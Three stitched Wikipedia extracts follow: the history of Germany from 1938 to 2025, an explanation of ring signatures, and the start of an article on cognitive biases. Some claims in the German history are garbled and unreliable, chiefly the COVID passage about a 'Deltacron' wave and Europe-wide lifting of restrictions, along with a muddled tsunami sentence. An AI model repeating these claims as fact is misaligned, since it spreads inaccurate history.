Having established a "Rome-Berlin axis" withBenito Mussolini, and signing theAnti-Comintern Pactwith Japan – which was joined by Italy a year later in 1937 – Hitler felt able to take the offensive in foreign policy. On 12 March 1938, German troops marched into Austria, where an attempted Nazi coup had been unsuccessful in 1934. When Austrian-born Hitler enteredVienna, he was greeted by loud cheers and Austrians voted in favour of the annexation of their country. After Austria, Hitler turned toCzechoslovakia, where theSudeten Germanminority was demanding equal rights and self-government. At theMunich Conferenceof September 1938, Hitler, Mussolini, British Prime MinisterNeville Chamberlainand French Prime MinisterÉdouard Daladieragreed upon the cession of Sudeten territory to the German Reich byCzechoslovakia. Hitler thereupon declared that all of German Reich's territorial claims had been fulfilled. However, hardly six months after the Munich Agreement Hitler used the smoldering quarrel betweenSlovaksandCzechsas a pretext for taking over the rest of Czechoslovakia. He then secured the return ofMemelfromLithuaniato Germany. Chamberlain was forced to acknowledge that his policy ofappeasementtowards Hitler had failed.
At first Germany was successful in its military operations. In less than three months (April – June 1940), Germany conqueredDenmark,Norway, the Low Countries, andFrance. The unexpectedly swift defeat of France resulted in an upswing in Hitler's popularity and an upsurge in war fever.[417][418]Hitler made peace overtures to the new British leaderWinston Churchillin July 1940, but Churchill remained dogged in his defiance with major help from US presidentFranklin D. Roosevelt. Hitler's bombing campaign against Britain (September 1940 – May 1941) failed. Some 43,000 British civilians were killed and 139,000 wounded inthe Blitz; much ofLondonwas destroyed. Germany's armed forcesinvaded the Soviet Unionin June 1941 swept forward until they reached the gates of Moscow. TheEinsatzgruppen(Nazi mobiledeath squads) executed all Soviet Jews that it located, while the Germans went to Jewish households and forced the families into concentration camps for labor or to extermination camps for death.
The tide began to turn in December 1941, when the invasion of the Soviet Union hit determined resistance in theBattle of Moscowand Hitler declared war on the United States in the wake of the JapanesePearl Harbor attack. After surrender inNorth Africaand losing theBattle of Stalingradin 1942–1943, the Germans were forced into the defensive. By late 1944, the United States, Canada, France, and Great Britain were closing in on Germany in the West, while the Soviets were victoriouslyadvancing in the East.
In 1944–1945, Soviet forces completely or partially liberatedRomania, Bulgaria,Hungary,Yugoslavia, Poland,Czechoslovakia,Austria, Denmark, andNorway. Nazi Germany collapsed asBerlin was takenby the Soviet Union's Red Army in a fight to the death on the city streets. 2,000,000 Soviet troops took part in the assault, and they faced 750,000 German troops. 78,000–305,000 Soviets were killed, while 325,000 German civilians and soldiers were killed.[419]Hitler committed suicide on 30 April 1945. The finalGerman Instrument of Surrenderwas signed on 8 May 1945, marking the end of Nazi Germany.
By September 1945, Nazi Germany and its Axis partners (mainlyItalyandJapan) had all been defeated, chiefly by the forces of the Soviet Union, the United States, and Britain. Much of Europe lay in ruins, over 60 million people worldwide had been killed (most of them civilians), including approximately 6 million Jews and 11 million non-Jews in what became known asthe Holocaust. World War II destroyed Germany's political and economic infrastructure, caused its partition, considerable loss of territory (especially in the East), and historical legacy of guilt and shame.[420]
As a consequence of the defeat of Nazi Germany in 1945 and the onset of theCold Warin 1947, the country's territory was shrunk and split between the two global blocs in the East and West, a period known as the division of Germany. Millions of refugees from Central and Eastern Europe moved west, most of them to West Germany. Two countries emerged:West Germanywas a parliamentary democracy, aNATOmember, a founding member of what since became theEuropean Unionas one of the world's largest economies and under allied military control until 1955,[421]whileEast Germanywas a totalitarian Communist dictatorship controlled by the Soviet Union as a satellite of Moscow. With the collapse of Communism in Europe in 1989,reunion followed.
No one doubted Germany's economic and engineering prowess; the question was how long bitter memories of the war would cause Europeans to distrust Germany, and whether Germany could demonstrate it had rejected totalitarianism and militarism and embraced democracy and human rights.[422]
At thePotsdam Conference, Germany wasdivided into four military occupation zonesby the Allies and did not regain independence until 1949. The provinces east of the Oder and Neisse rivers (theOder-Neisse line) were transferred to Poland and Soviet Russia (Kaliningrad oblast) while Saarland separated from Germany to become a Frenchprotectorateon 17 December 1947 (joined West Germany on 1 January 1957), pending a final peace conference with Germany, which eventually never took place.[423]Most of the remaining German populationwas expelled. Around 6.7 million Germans living in"west-shifted" Poland, mostly within previously German lands, and the 3 million in German-settled regions of Czechoslovakia weredeported west.[424]
The total ofGerman war deadwas 8% to 10% out of a prewar population of 69,000,000, or between 5.5 million and 7 million people. This included 4.5 million in the military, and between 1 and 2 million civilians. There was chaos as 11 million foreign workers and POWs left, while soldiers returned home and more than 14 million displaced German-speaking refugees from both the eastern provinces and East-Central and Eastern Europe were expelled from their native land and came to the western German lands, often foreign to them.[425]During theCold War, theWest Germangovernment estimated a death toll of 2.2 million civilians due to theflight and expulsion of Germansand throughforced labour in the Soviet Union.[426][427]This figure remained unchallenged until the 1990s, when some historians put the death toll at 500,000–600,000 confirmed deaths.[428]In 2006, the German government reaffirmed its position that 2.0–2.5 million deaths occurred.
Denazificationremoved, imprisoned, or executed most top officials of the old regime, but most middle and lower ranks of civilian officialdom were not seriously affected. In accordance with the Allied agreement made at theYalta Conference, millions of POWs were used asforced laborby the Soviet Union and other European countries.[429]
In the East, the Soviets crushed dissent and imposed another police state, often employing ex-Nazis in the dreadedStasi. The Soviets extracted about 23% of the East German GNP for reparations, while in the West reparations were a minor factor.[430]
In 1945–1946 housing and food conditions were bad, as the disruption of transport, markets, and finances slowed a return to normal. In the West, bombing had destroyed the fourth of the housing stock,[431]and over 10 million refugees from the east had crowded in, most living in camps.[432]Food production in 1946–1948 was only two-thirds of the prewar level, while grain and meat shipments – which usually supplied 25% of the food – no longer arrived from the East. Furthermore, the end of the war brought the end of large shipments of food seized from occupied nations that had sustained Germany during the war. Coal production was down 60%, which had cascading negative effects on railroads, heavy industry, and heating.[433]Industrial production fell more than half and reached prewar levels only at the end of 1949.[434]
Allied economic policy originally was one ofindustrial disarmamentplus building the agricultural sector. In the western sectors, most of the industrial plants had minimal bomb damage and the Allies dismantled 5% of the industrial plants for reparations.[435]
However, deindustrialization became impractical and the U.S. instead called for a strong industrial base in Germany so it could stimulate European economic recovery.[436]The U.S. shipped food in 1945–1947 and made a $600 million loan in 1947 to rebuild German industry. By May 1946 the removal of machinery had ended, thanks to lobbying by the U.S. Army. The Truman administration finally realised that economic recovery in Europe could not go forward without the reconstruction of the German industrial base on which it had previously been dependent. Washington decided that an "orderly, prosperous Europe requires the economic contributions of a stable and productive Germany".[437][438]
In 1945, the occupying powers took over all newspapers in Germany and purged them of Nazi influence. The American occupation headquarters, the Office of Military Government, United States (OMGUS) began its own newspaper based in Munich,Die Neue Zeitung.It was edited by German and Jewish émigrés who fled to the United States before the war. Its mission was to encourage democracy by exposing Germans to how American culture operated. The paper was filled with details on American sports, politics, business, Hollywood, and fashions, as well as international affairs.[439]
On 7 October 1949, the Soviet zone became the "Deutsche Demokratische Republik" – "DDR" ("German Democratic Republic" – "GDR", simply often "East Germany"), under control of the Socialist Unity Party. Neither country had a significant army until the 1950s, but East Germany built theStasiinto a powerful secret police that infiltrated every aspect of its society.[440]
East Germany was anEastern blocstate under political and military control of the Soviet Union through her occupation forces and theWarsaw Treaty. Political power was solely executed by leading members (Politburo) of the communist-controlledSocialist Unity Party(SED). A Soviet-stylecommand economywas set up; later the GDR became the most advancedComeconstate. WhileEast German propagandawas based on the benefits of the GDR's social programs and the alleged constant threat of a West German invasion, many of her citizens looked to the West for political freedoms and economic prosperity.[441]
Walter Ulbrichtwas the party boss from 1950 to 1971. In 1933, Ulbricht had fled to Moscow, where he served as a Comintern agent loyal to Stalin. As World War II was ending, Stalin assigned him the job of designing the postwar German system that would centralize all power in the Communist Party. Ulbricht became deputy prime minister in 1949 and secretary (chief executive) of the Socialist Unity (Communist) party in 1950.[442]Some 2.6 million people had fled East Germany by 1961 when he built theBerlin Wallto stop them – shooting those who attempted it. What the GDR called the "Anti-Fascist Protective Wall" was a major embarrassment for the program during the Cold War, but it did stabilize East Germany and postpone its collapse.[443][444]Ulbricht lost power in 1971, but was kept on as a nominal head of state. He was replaced because he failed to solve growing national crises, such as the worsening economy in 1969–1970, the fear of another popular uprising as had occurred in 1953, and the disgruntlement between Moscow and Berlin caused by Ulbricht's détente policies toward the West.
The transition toErich Honecker(General Secretaryfrom 1971 to 1989) led to a change in the direction of national policy and efforts by the Politburo to pay closer attention to the grievances of the proletariat.Honecker's plans were not successful, however, with the dissent growing among East Germany's population.
In 1989, the socialist regime collapsed after 40 years, despite its omnipresent secret police, theStasi. The main reasons for its collapse included severe economic problems and growing emigration towards the West.
East Germany's culture was shaped by Communism and particularly Stalinism. It was characterized by East German psychoanalyst Hans-Joachim Maaz in 1990 as having produced a "Congested Feeling" among Germans in the East as a result of Communist policies criminalizing personal expression that deviates from government approved ideals, and through the enforcement of Communist principals by physical force and intellectual repression by government agencies, particularly the Stasi.[445]Critics of the East German state have claimed that the state's commitment to communism was a hollow and cynical tool of a ruling elite. This argument has been challenged by some scholars who claim that the Party was committed to the advance of scientific knowledge, economic development, and social progress. However, the vast majority regarded the state's Communist ideals to be nothing more than a deceptive method for government control.[445]
According to German historianJürgen Kocka(2010):
On 23 May 1949, thethree western occupation zones(American, British, and French) were combined into the Federal Republic of Germany (FRG, West Germany). The government was formed under ChancellorKonrad Adenauerand his conservative CDU/CSU coalition.[447]The CDU/CSU was in power during most of the period since 1949. The capital wasBonnuntil it was moved to Berlin in 1990. In 1990, FRG absorbedEast Germanyand gained full sovereignty over Berlin. At all points West Germany was much larger and richer than East Germany, which became a dictatorship under the control of the Communist Party and was closely monitored by Moscow. Germany, especially Berlin, was a cockpit of theCold War, with NATO and the Warsaw Pact assembling major military forces in west and east. However, there was never any combat.[448]
West Germany enjoyed prolonged economic growth beginning in the early 1950s (Wirtschaftswunderor "Economic Miracle").[449]Industrial production doubled from 1950 to 1957, and gross national product grew at a rate of 9 or 10% per year, providing the engine for economic growth of all of Western Europe. Labor unions supported the new policies with postponed wage increases, minimized strikes, support for technological modernization, and a policy ofco-determination(Mitbestimmung), which involved a satisfactory grievance resolution system as well as requiring representation of workers on the boards of large corporations.[450]The recovery was accelerated by thecurrency reform of June 1948, U.S. gifts of $1.4 billion as part of theMarshall Plan, the breaking down of old trade barriers and traditional practices, and the opening of the global market.[451]West Germany gained legitimacy and respect, as it shed the horrible reputation Germany had gained under the Nazis.
West Germany played a central role in the creation of European cooperation; it joinedNATOin 1955 and was a founding member of theEuropean Economic Communityin 1958.
The most dramatic and successful policy event was the currency reform of 1948.[452]Since the 1930s, prices and wages had been controlled, but money had been plentiful. That meant that people had accumulated large paper assets, and that official prices and wages did not reflect reality, as the black market dominated the economy and more than half of all transactions were taking place unofficially. On 21 June 1948, the Western Allies withdrew the old currency and replaced it with the newDeutsche Markat the rate of 1 new per 10 old. This wiped out 90% of government and private debt, as well as private savings. Prices were decontrolled, and labor unions agreed to accept a 15% wage increase, despite the 25% rise in prices. The result was that prices of German export products held steady, while profits and earnings from exports soared and were poured back into the economy. The currency reforms were simultaneous with the $1.4 billion inMarshall Planmoney coming in from the United States, which was used primarily for investment.
In addition, the Marshall Plan forced German companies, as well as those in all of Western Europe, to modernize their business practices and take account of the international market. Marshall Plan funding helped overcome bottlenecks in the surging economy caused by remaining controls (which were removed in 1949), and Marshall Plan business reforms opened up a greatly expanded market for German exports. Overnight, consumer goods appeared in the stores, because they could be sold for realistic prices, emphasizing to Germans that their economy had turned a corner.[432]
The success of the currency reform angered the Soviets, who cut off all road, rail, and canal links between the western zones andWest Berlin. This was theBerlin Blockade, which lasted from 24 June 1948 to 12 May 1949. In response, the U.S. and Britain launched an airlift of food and coal and distributed the new currency in West Berlin as well. The city thereby became economically integrated into West Germany.[453]Until the mid-1960s, it served as "America's Berlin", symbolizing the United States' commitment to defending its freedom, which John F. Kennedy underscored during his visit in June 1963.[454]
Konrad Adenauerwas the dominant leader in West Germany.[455]He was the first chancellor (top official) of the FRG and until his death was the founder and leader of the Christian Democratic Union (CDU), a coalition of conservatives,ordoliberals, and adherents of Protestant andCatholic social teachingthat dominated West Germany politics for most of its history. During his chancellorship, the West Germany economy grew quickly, and West Germany established friendly relations with France, participated in the emergingEuropean Union, established the country's armed forces (theBundeswehr), and became a pillar ofNATOas well as firm ally of the United States. Adenauer's government also commenced the long process of reconciliation with the Jews andIsraelafter the Holocaust.[456]
Ludwig Erhardwas in charge of economic policy as economics director for the British and American occupation zones and was Adenauer's long-time economics minister. Erhard's decision to lift many price controls in 1948 (despite opposition from both the social democratic opposition and Allied authorities), plus his advocacy of free markets, helped set the Federal Republic on its strong growth from wartime devastation.[457]Norbert Walter, a former chief economist atDeutsche Bank, argues that "Germany owes its rapid economic advance after World War II to the system of the Social Market Economy, established by Ludwig Erhard."[458][459]Erhard was politically less successful when he served as the CDU Chancellor from 1963 until 1966. Erhard followed the concept of asocial market economy, and was in close touch with professional economists. Erhard viewed the market itself as social and supported only a minimum of welfare legislation. However, Erhard suffered a series of decisive defeats in his effort to create a free, competitive economy in 1957; he had to compromise on such key issues as the anti-cartel legislation. Thereafter, the West German economy evolved into a conventional west European welfare state.[460]
Meanwhile, in adopting theGodesberg Programin 1959, theSocial Democratic Party of Germany(SPD) largely abandoned Marxism ideas and embraced the concept of themarket economyand the welfare state. Instead it now sought to move beyond its old working class base to appeal the full spectrum of potential voters, including the middle class and professionals. Labor unionscooperatedincreasingly with industry, achieving labor representation on corporate boards and increases in wages and benefits.[461]
In 1966, Erhard lost support andKurt Kiesingerwas elected as Chancellor by a new CDU/CSU-SPDalliance combining the two largest parties.Social democratic(SPD) leaderWilly Brandtwas Deputy Federal Chancellor and Foreign Minister. The 1966–1969 Grand Coalition reduced tensions with the Soviet bloc nations and establishing diplomatic relations withCzechoslovakia,RomaniaandYugoslavia.
With a booming economy short of unskilled workers, especially after the Berlin Wall cut off the steady flow of East Germans, the FRG negotiated migration agreements with Italy (1955),Spain(1960), Greece (1960), and Turkey (1961) that brought in hundreds of thousands of temporary guest workers, calledGastarbeiter. In 1968, the FRG signed a guest worker agreement with Yugoslavia that employed additional guest workers.Gastarbeiterwere young men who were paid full-scale wages and benefits, but were expected to return home in a few years.[462]
The agreement with Turkey ended in 1973 but few workers returned because there were few good jobs in Turkey.[463]By 2010 there were about 4 million people of Turkish descent in Germany. The generation born in Germany attended German schools, but had a poor command of either German or Turkish, and had either low-skilled jobs or were unemployed.[464][465]
Willy Brandtwas the leader of theSocial Democratic Partyin 1964–1987 and West German Chancellor in 1969–1974. Under his leadership, the German government sought to reduce tensions with theSoviet Unionand improve relations with theGerman Democratic Republic, a policy known as theOstpolitik.[449]Relations between the two German states had been icy at best, with propaganda barrages in each direction. The heavy outflow of talent from East Germany prompted the building of theBerlin Wallin 1961, which worsenedCold Wartensions and prevented East Germans from travel. Although anxious to relieve serious hardships for divided families and to reduce friction, Brandt'sOstpolitikwas intent on holding to its concept of "two German states in one German nation".
Ostpolitikwas opposed by the conservative elements in Germany, but won Brandt an international reputation and the Nobel Peace Prize in 1971.[466]In September 1973, both West and East Germany were admitted to theUnited Nations. The two countries exchanged permanent representatives in 1974, and, in 1987, East Germany's leaderErich Honeckerpaid anofficial state visitto West Germany.[467]
After 1973, Germany was hard hit by a worldwide economic crisis, soaring oil prices, and stubbornly high unemployment, which jumped from 300,000 in 1973 to 1.1 million in 1975. TheRuhrregion was hardest hit, as its easy-to-reach coal mines petered out, and expensive German coal was no longer competitive. Likewise the Ruhr steel industry went into sharp decline, as its prices were undercut by lower-cost suppliers such as Japan. The welfare system provided a safety net for the large number of unemployed workers, and many factories reduced their labor force and began to concentrate on high-profit specialty items. After 1990 the Ruhr moved into service industries and high technology. Cleaning up the heavy air and water pollution became a major industry in its own right. Meanwhile, formerly rural Bavaria became a high-tech center of industry.[435]
A spy scandal forced Brandt to step down as Chancellor while remaining as party leader. He was replaced byHelmut Schmidt(b. 1918), of the SPD, who served as Chancellor in 1974–1982. Schmidt continued theOstpolitikwith less enthusiasm. He had aPhDin economics and was more interested in domestic issues, such as reducinginflation. The debt grew rapidly as he borrowed to cover the cost of the ever more expensive welfare state.[468]After 1979, foreign policy issues grew central as the Cold War turned hot again. The German peace movement mobilized hundreds of thousands of demonstrators to protest against American deployment in Europe of newmedium-range ballistic missiles. Schmidt supported the deployment but was opposed by the left wing of the SPD and by Brandt.
The pro-businessFree Democratic Party (FDP)had been in coalition with the SPD, but now it changed direction.[469]Led by Finance MinisterOtto Graf Lambsdorffthe FDP adopted the market-oriented "Kiel Theses" in 1977; it rejected the Keynesian emphasis on consumer demand, and proposed to reduce social welfare spending, and try to introduce policies to stimulate production and facilitate jobs. Lambsdorff argued that the result would be economic growth, which would itself solve both the social problems and the financial problems. As a consequence, the FDP switched allegiance to the CDU and Schmidt lost his parliamentary majority in 1982. For the only time in West Germany's history, the government fell on avote of no confidence.[432][470]
Helmut Kohlbrought the conservatives back to power with aCDU/CSU-FDP coalitionin 1982, and served as Chancellor until 1998.[449]He orchestrated reunification with the approval of all the Four Powers from World War II, who still had a voice in German affairs.[471]He lost inthe left's biggest landslide victory in 1998, and was succeeded by the SPD'sGerhard Schröder.[472]
During the summer of 1989, rapid changes known aspeaceful revolutionorDie Wendetook place in East Germany, which quickly led toGerman reunification.[449]Growing numbers of East Germans emigrated to West Germany, many via Hungary after Hungary's reformist government opened its borders.
The opening of theIron CurtainbetweenAustriaandHungaryat the Pan-European Picnic in August 1989 then triggered a chain reaction, at the end of which there was no longer a GDR and the Eastern Bloc had disintegrated.Otto von Habsburg's idea developed the greatest mass exodus since the construction of the Berlin Wall and it was shown that the USSR and the rulers of the Eastern European satellite states were not ready to keep the Iron Curtain effective. This made their loss of power visible and clear that the GDR no longer received effective support from the other communist Eastern Bloc countries.[473][474][475]Thousands of East Germans then tried to reach the West by staging sit-ins at West German diplomatic facilities in other East European capitals, most notably in Prague. The exodus generated demands within East Germany for political change, andmass demonstrations in several citiescontinued to grow.[476]
Unable to stop the growing civil unrest,Erich Honeckerwas forced to resign in October, and on 9 November, East German authorities unexpectedly allowed East German citizens to enter West Berlin and West Germany. Hundreds of thousands of people took advantage of the opportunity; new crossing pointswere opened in the Berlin Walland along the border with West Germany. This led to the acceleration of the process of reforms in East Germany that ended with the dissolution of East Germany and theGerman reunificationthat came into force on 3 October 1990.[477]
The SPD/Green coalition won the 1998 elections and SPD leaderGerhard Schröderpositioned himself as acentrist"Third Way" candidate in the mold ofU.K. Prime MinisterTony BlairandU.S. PresidentBill Clinton. Schröder proposedAgenda 2010, a significant downsizing of the welfare state with five goals: tax cuts; labor market deregulation, especially relaxing rules protecting workers from dismissal and setting upHartz conceptjob training; modernizing the welfare state by reducing entitlements; decreasing bureaucratic obstacles for small businesses; and providing new low-interest loans to local governments.[478]
On 26 December 2004 duringBoxing Daycelebration, about more than nearly 540 Germans have died and many more thousands of Germans are missing fromIndian Ocean tsunami from Indonesian earthquakewhile vacationing in SouthernThailand.[citation needed]
In 2005, after the SPD lost to theChristian Democratic Union (CDU)inNorth Rhine-Westphalia,Gerhard Schröderannounced he would call federal elections "as soon as possible". Amotion of confidencewas subsequently defeated after Schröder urged members not to vote for his government to trigger new elections. In response, a grouping of left-wing SPD dissidents and the neo-communistParty of Democratic Socialismagreed to run on a joint ticket in the general election, with Schröder's rivalOskar Lafontaineleading the new group.
In the2005 elections,Angela Merkelbecame the first female chancellor. In 2009 the German government approved a €50 billion stimulus plan.[479]Among the major German political projects of the early 21st century are the advancement ofEuropean integration, theenergy transition(Energiewende) for asustainable energysupply, thedebt brakefor balanced budgets, measures to increase thefertility rate(pronatalism), and high-tech strategies for the transition of the German economy, summarised asIndustry 4.0.[480]From2005to2009and2013to2021, Germany was ruled by agrand coalitionled by the CDU'sAngela Merkelas chancellor. From 2009 to 2013, Merkel headed a centre-right government of the CDU/CSU and FDP.[481]
Together with France, Italy, Netherlands, and other EU member nations, Germany has played the leading role in theEuropean Union. Germany (especially under ChancellorHelmut Kohl) was one of the main supporters of admitting many East European countries to the EU. Germany is at the forefront of European states seeking to exploit the momentum of monetary union to advance the creation of a more unified and capable European political, defence and security apparatus. German Chancellor Schröder expressed an interest in a permanent seat for Germany in theUN Security Council, identifying France, Russia, and Japan as countries that explicitly backed Germany's bid. Germany formally adopted the Euro on 1 January 1999 after permanently fixing the Deutsche Mark rate on 31 December 1998.[482][483]
Since 1990, GermanBundeswehrhas participated in a number of peacekeeping and disaster relief operations abroad. Since 2002, German troops formed part of theInternational Security Assistance Forcein theWar in Afghanistan, resulting in the first Germancasualtiesin combat missions since World War II.
In light of the worldwideGreat Recessionthat began in 2008, Germany did not experience as much economic hardship as other European nations. Germany later sponsored a massive financial rescue in the wake of theEurozone crisiswhich affected the German economy.
Following the2011 earthquake and tsunamiin Japan, which led to theFukushima nuclear disaster, German public opinion turned sharply againstnuclear power in Germany, which at the time produced a fourth of the electricity supply. In response Merkel announced plans to close down the nuclear power plants over the following decade, and a commitment to rely more heavily on wind and other alternative energy sources, in addition to coal and natural gas.[484]
Germany was affected by theEuropean migrant crisisin 2015 as it became the final destination of choice for many asylum seekers fromAfricaand theMiddle Eastentering the EU. The country took in over a million refugees and migrants and developed a quota system which redistributed migrants around its federal states based on their tax income and existing population density.[485]The decision by Merkel to authorize unrestricted entry led to heavy criticism in Germany as well as within Europe.[486][487]This was a major factor in the rise of the far-right partyAlternative for Germanywhich entered the Bundestag in the2017 federal election.[488]
In January 2020, Germany has confirmed the first case ofnovel coronavirus, found from Wuhan, China. In March 2020, Germany went to the national lockdowns, which was greatly affected by the pandemic, and greatly impact on German economy, healthcare system, and society, and also commended for being an effective model for instituting methods of curbing infections and deaths, but lost this status by the end of the year due to rising number of cases, hospitalizations, and deaths. In December 2020, COVID-19 vaccines began to be administered in Germany. Unfortunately, from June 2021 to the end of March 2022, Germany has might seeing a new surge of huge COVID-19 infection wave, fueled by the highly transmissibleDeltacronhybrid variant, which is combined of Delta and Omicron mutations. However, Germany has suffered from a recombination event of Deltacron, which was caused of less access to vaccine shortage in the first quarter. As of May 2022, Germany has reported 140,292 COVID-19-related deaths, the fifth highest mortality toll (Behind Russia, the United Kingdom,Italy, andFrance), out of 2 million deaths in Europe.[489]
On 8 April 2022 just after the first two years of pandemic, Germany joinedFrance,Italy,Netherlands,Belgium,Luxembourg,Austria,Switzerland,Greece,Turkey, andCypruswere lifted all COVID-19 restrictions, measures, and state of emergencies up in the future.[citation needed]
On 8 December 2021 just three months after Germany's centre-left Social Democrats (SPD) narrowly won the federalelection, ending 16 years of conservative-led rule under Angela Merkel, Social DemocratOlaf Scholzwas sworn in as Germany's new chancellor. He formed a coalition government with the Green Party and the liberal Free Democrats.[490][491]
In February 2022,Frank-Walter Steinmeierwas elected for a second five-year term as Germany's president. Although largely ceremonial post, he has been seen as a symbol of consensus and continuity.[492]
AfterRussia's Feb. 24 invasion of Ukrainein 2022, Germany's previous foreign policy towards Russia (traditional Ostpolitik) has been severely criticized for having been too credulous and soft.[493]Following concerns from the2022 Russian invasion of Ukraine, Germany announced a major shift in policy, pledging a €100 billion special fund for the Bundeswehr – to remedy years of underinvestment – along with raising the budget to above 2%GDP.[494]As of April 2023, over 1.06 million refugees from Ukraine were recorded in Germany.[495]
As of December 2023, Germany is the fourth largest economy in the world after the United States, China and Japan and the largest economy in Europe. It is the third largest export nation in the world.[496]
In February 2025, CDU/CSU, the conservatives, won Germany's 2025 federalelection, becoming the biggest group in the parliament. However, far-right Alternative for Germany, AfD, doubled its support to became the second biggest political party in parliament with 20.8% of the vote. SPD, the Social Democrats, had its worst performance in decades with 16.4% of the vote.[497]
On 6 May 2025,Friedrich Merzwas sworn in as Germany's next chancellor by President Frank-Walter Steinmeier. Merz formed a coalition with his Christian Democrats, its sister party the Christian Social Union and the Social Democrats.[498]
|
https://en.wikipedia.org/wiki/History_of_Germany
|
Incryptography, aring signatureis a type ofdigital signaturethat can be performed by any member of a set of users that each havekeys. Therefore, a message signed with a ring signature is endorsed by someone in a particular set of people. One of the security properties of a ring signature is that it should be computationally infeasible to determinewhichof the set's members' keys was used to produce the signature. Ring signatures are similar togroup signaturesbut differ in two key ways: first, there is no way to revoke the anonymity of an individual signature; and second, any set of users can be used as a signing set without additional setup.
Ring signatures were invented byRon Rivest,Adi Shamir, andYael Tauman Kalai, and introduced atASIACRYPTin 2001.[1]The name,ring signature, comes from the ring-like structure of the signaturealgorithm.
Suppose that a set of entities each have public/private key pairs, (P1,S1), (P2,S2), ..., (Pn,Sn). Partyican compute a ring signature σ on a messagem, on input (m,Si,P1, ...,Pn). Anyone can check the validity of a ring signature given σ,m, and the public keys involved,P1, ...,Pn. If a ring signature is properly computed, it should pass the check. On the other hand, it should be hard for anyone to create a valid ring signature on any message for any set without knowing any of the private keys for that set.[2]
In the original paper, Rivest, Shamir, and Tauman described ring signatures as a way to leak a secret. For instance, a ring signature could be used to provide an anonymous signature from "a high-rankingWhite Houseofficial", without revealing which official signed the message. Ring signatures are right for this application because the anonymity of a ring signature cannot be revoked, and because the group for a ring signature can be improvised.
Another application, also described in the original paper, is fordeniable signatures. Here the sender and the recipient of a message form a group for the ring signature, then the signature is valid to the recipient, but anyone else will be unsure whether the recipient or the sender was the actual signer. Thus, such a signature is convincing, but cannot be transferred beyond its intended recipient.
There were various works, introducing new features and based on different assumptions:
Most of the proposed algorithms haveasymptoticoutput sizeO(n){\displaystyle O(n)}; i.e., the size of the resulting signature increases linearly with the size of input (number of public keys). That means that such schemes are impracticable for real use cases with sufficiently largen{\displaystyle n}(for example, an e-voting with millions of participants). But for some application with relatively smallmedianinput size such estimate may be acceptable.CryptoNoteimplementsO(n){\displaystyle O(n)}ring signature scheme by Fujisaki and Suzuki[5]in p2p payments to achieve sender's untraceability.
More efficient algorithms have appeared recently. There are schemes with the sublinear size of the signature,[6]as well as with constant size.[7]
The original paper describes anRSAbased ring signature scheme, as well as one based onRabin signatures. They define akeyed"combining function"Ck,v(y1,y2,…,yn){\displaystyle C_{k,v}(y_{1},y_{2},\dots ,y_{n})}which takes a keyk{\displaystyle k}, an initialization valuev{\displaystyle v}, and a list of arbitrary valuesy1,…yn{\displaystyle y_{1},\dots y_{n}}.yi{\displaystyle y_{i}}is defined asgi(xi){\displaystyle g_{i}(x_{i})}, wheregi{\displaystyle g_{i}}is a trap-door function (i.e. an RSA public key in the case of RSA based ring signatures).
The functionCk,v(y1,y2,…,yn){\displaystyle C_{k,v}(y_{1},y_{2},\dots ,y_{n})}is called the ring equation, and is defined below. The equation is based on asymmetric encryption functionEk{\displaystyle E_{k}}:
It outputs a single valuez{\displaystyle z}which is forced to be equal tov{\displaystyle v}. The equationv=Ck,v(y1,y2,…,yn){\displaystyle v=C_{k,v}(y_{1},y_{2},\dots ,y_{n})}can be solved as long as at least oneyi{\displaystyle y_{i}}, and by extensionxi{\displaystyle x_{i}}, can be freely chosen. Under the assumptions of RSA, this implies knowledge of at least one of the inverses of the trap door functionsgi−1{\displaystyle g_{i}^{-1}}(i.e. a private key), sincegi−1(yi)=xi{\displaystyle g_{i}^{-1}(y_{i})=x_{i}}.
Generating a ring signature involves six steps. The plaintext is signified bym{\displaystyle m}, the ring's public keys byP1,P2,…,Pn{\displaystyle P_{1},P_{2},\dots ,P_{n}}.
Signature verification involves three steps.
Here is aPythonimplementation of the original paper usingRSA. Requires 3rd-party module PyCryptodome.
To sign and verify 2 messages in a ring of 4 users:
Monero[8]and several othercryptocurrenciesuse this technology.[citation needed]
This article incorporatestextavailable under theCC BY-SA 4.0license.
|
https://en.wikipedia.org/wiki/Ring_signature
|
Acognitive biasis a systematic pattern of deviation fromnormor rationality in judgment.[1][2]Individuals create their own "subjective reality" from their perception of the input. An individual's construction of reality, not theobjectiveinput, may dictate theirbehaviorin the world. Thus, cognitive biases may sometimes lead to perceptual distortion, inaccurate judgment, illogical interpretation, andirrationality.[3][4][5]
While cognitive biases may initially appear to be negative, some are adaptive. They may lead to more effective actions in a given context.[6]Furthermore, allowing cognitive biases enables faster decisions which can be desirable when timeliness is more valuable than accuracy, as illustrated inheuristics.[7]Other cognitive biases are a "by-product" of human processing limitations,[1]resulting from a lack of appropriate mental mechanisms (bounded rationality), the impact of an individual's constitution and biological state (seeembodied cognition), or simply from a limited capacity for information processing.[8][9]Research suggests that cognitive biases can make individuals more inclined to endorsing pseudoscientific beliefs by requiring less evidence for claims that confirm their preconceptions. This can potentially distort their perceptions and lead to inaccurate judgments.[10]
A continually evolvinglist of cognitive biaseshas been identified over the last six decades of research on human judgment and decision-making incognitive science,social psychology, andbehavioral economics. The study of cognitive biases has practical implications for areas including clinical judgment, entrepreneurship, finance, and management.[11][12]
The notion of cognitive biases was introduced byAmos TverskyandDaniel Kahnemanin 1972[13]and grew out of their experience of people'sinnumeracy, or inability to reason intuitively with the greaterorders of magnitude. Tversky, Kahneman, and colleagues demonstrated severalreplicableways in which human judgments and decisions differ fromrational choice theory. Tversky and Kahneman explained human differences in judgment and decision-making in terms of heuristics. Heuristics involve mental shortcuts which provide swift estimates about the possibility of uncertain occurrences.[14]Heuristics are simple for the brain to compute but sometimes introduce "severe and systematic errors."[7]For example, the representativeness heuristic is defined as "The tendency to judge the frequency or likelihood" of an occurrence by the extent of which the event "resembles the typical case."[14]
The "Linda Problem" illustrates the representativeness heuristic (Tversky & Kahneman, 1983[15]). Participants were given a description of "Linda" that suggests Linda might well be a feminist (e.g., she is said to be concerned about discrimination and social justice issues). They were then asked whether they thought Linda was more likely to be (a) a "bank teller" or (b) a "bank teller and active in the feminist movement." A majority chose answer (b). Independent of the information given about Linda, though, the more restrictive answer (b) is under any circumstance statistically less likely than answer (a). This is an example of the "conjunction fallacy". Tversky and Kahneman argued that respondents chose (b) because it seemed more "representative" or typical of persons who might fit the description of Linda. The representativeness heuristic may lead to errors such as activating stereotypes and inaccurate judgments of others (Haselton et al., 2005, p. 726).
